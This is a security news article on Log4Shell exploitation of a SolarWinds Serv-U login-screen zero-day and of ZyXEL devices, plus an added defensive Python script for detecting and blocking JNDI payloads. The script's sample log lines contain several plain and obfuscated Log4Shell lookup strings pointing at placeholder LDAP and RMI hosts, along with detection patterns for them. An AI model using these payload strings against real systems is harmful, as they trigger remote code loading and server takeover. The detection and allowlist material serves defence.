New Log4j attacks target SolarWinds, ZyXEL devices
Attackers looking to capitalize on the Log4Shell vulnerability are going after SolarWinds and ZyXEL products known to use the Log4j library, according to two reports published on Wednesday by Microsoft and Akamai.
The most urgent of these attacks are those spotted by Microsoft, which said it discovered a threat actor abusing Log4Shell in combination with a zero-day vulnerability in the SolarWinds Serv-U file-sharing server.
Microsoft described the zero-day as an input validation issue in the Serv-U web login screen: the login form accepted characters it should have rejected, and the attackers used that gap to pass a Log4Shell payload (a JNDI lookup string) through the login process and then exploit Log4Shell to take over Serv-U servers. The two flaws are independent, so the input validation bug needs its own Serv-U update; patching Log4j alone does not close the login-screen weakness.
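The delivery mechanism the report describes is a JNDI lookup string arriving in a login field. The script below is an added example for this article, not code from Microsoft, SolarWinds, Akamai or the Log4j project: it unwraps the lookup nesting attackers use to hide the literal `jndi` token, flags such payloads in a set of constructed log lines (the `user="..."` key=value format and the username allowlist are assumptions, not the real Serv-U log format or policy), and shows the allowlist-style input check that closes the hole without trying to enumerate obfuscations.

```python
"""Spot Log4Shell (JNDI lookup) payloads delivered through a login field.

Added example for this article, not code from Microsoft, Akamai, SolarWinds
or Apache. The log format and the username policy below are assumptions
made for illustration.
"""
import re
from typing import List, Tuple

# Log4j 2 resolves nested lookups before the outer one, so attackers hide the
# literal "jndi" token inside ${lower:..}, ${upper:..} or the default-value
# syntax ${name:-value} (including the degenerate ${::-j}).  Both patterns
# exclude "$", "{" and "}" so they only ever match an innermost lookup.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:")

# Assumed allowlist for a login name; adjust to the deployment's real policy.
_USERNAME_OK = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def normalize_lookups(value: str, max_rounds: int = 32) -> str:
    """Resolve the obfuscation lookups from the inside out and lowercase.

    Returns the form Log4j would see just before evaluating the outer lookup,
    e.g. "${${lower:j}ndi:ldap://x}" -> "${jndi:ldap://x}".  Lookups that
    cannot be resolved offline (${env:...}, ${sys:...}) are left in place.
    """
    for _ in range(max_rounds):
        resolved = _CASE_LOOKUP.sub(lambda m: m.group(1), value)
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == value:
            break
        value = resolved
    return value.lower()


def is_jndi_payload(value: str) -> bool:
    """True if the input resolves to a JNDI lookup of any scheme (ldap, rmi, dns...)."""
    return _JNDI.search(normalize_lookups(value)) is not None


def is_safe_login_input(value: str) -> bool:
    """Allowlist check for a login field.

    Rather than enumerating obfuscations, reject anything outside the
    assumed username character set; "${" can never appear in a valid name,
    so even unresolved lookups such as ${env:HOME} are refused.
    """
    return _USERNAME_OK.fullmatch(value) is not None


# Constructed log lines in an assumed key=value format (not real Serv-U logs).
SAMPLE_LOG = [
    'user="alice" src=10.0.0.5 result=ok',
    'user="${jndi:ldap://198.51.100.7:1389/a}" src=203.0.113.9 result=fail',
    'user="${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.9/x}" src=203.0.113.9 result=fail',
    'user="${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/y}" src=203.0.113.9 result=fail',
    'user="bob" src=10.0.0.6 result=fail',
    'user="${env:HOME}" src=10.0.0.7 result=fail',
]

_USER_FIELD = re.compile(r'user="([^"]*)"')


def scan_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized payload) for each JNDI hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = _USER_FIELD.search(line)
        if m and is_jndi_payload(m.group(1)):
            hits.append((n, normalize_lookups(m.group(1))))
    return hits


if __name__ == "__main__":
    for n, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup -> {payload}")
    for name in ("alice", "${env:HOME}", "${${lower:j}ndi:ldap://x/a}"):
        print(f"{name!r}: {'accept' if is_safe_login_input(name) else 'reject'}")
```

Two design points matter here. Detection normalizes before matching, because a pattern for the literal `${jndi:` misses every nested variant; the unwrapping loop is bounded so a hostile input cannot spin it forever. Prevention does not rely on detection at all: the allowlist rejects `${env:HOME}` (which is not a JNDI payload) just as firmly as the obfuscated ones, which is the property an input validation fix for a login form should have.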
Separately, Akamai security researcher Larry Cashdollar reported spotting a Mirai-based DDoS botnet exploiting Log4Shell against ZyXEL networking devices.
While news cycles move fast from topic to topic, the situation around the Log4Shell exploit has not changed since last month, and the vulnerability is still heavily targeted and abused by threat actors seeking to enter corporate networks.
At the time of writing, ransomware gangs, nation-state cyber-espionage groups, crypto-mining crews, initial access brokers, and DDoS botnets have all been reported using the vulnerability in their operations.
Although the Apache Software Foundation has released patches for the Log4j library, attacks against applications that bundle it will continue: not every vendor has shipped its own security update, so many networks remain exposed until the embedded copy is updated, and that gap is likely to fuel exploitation for years.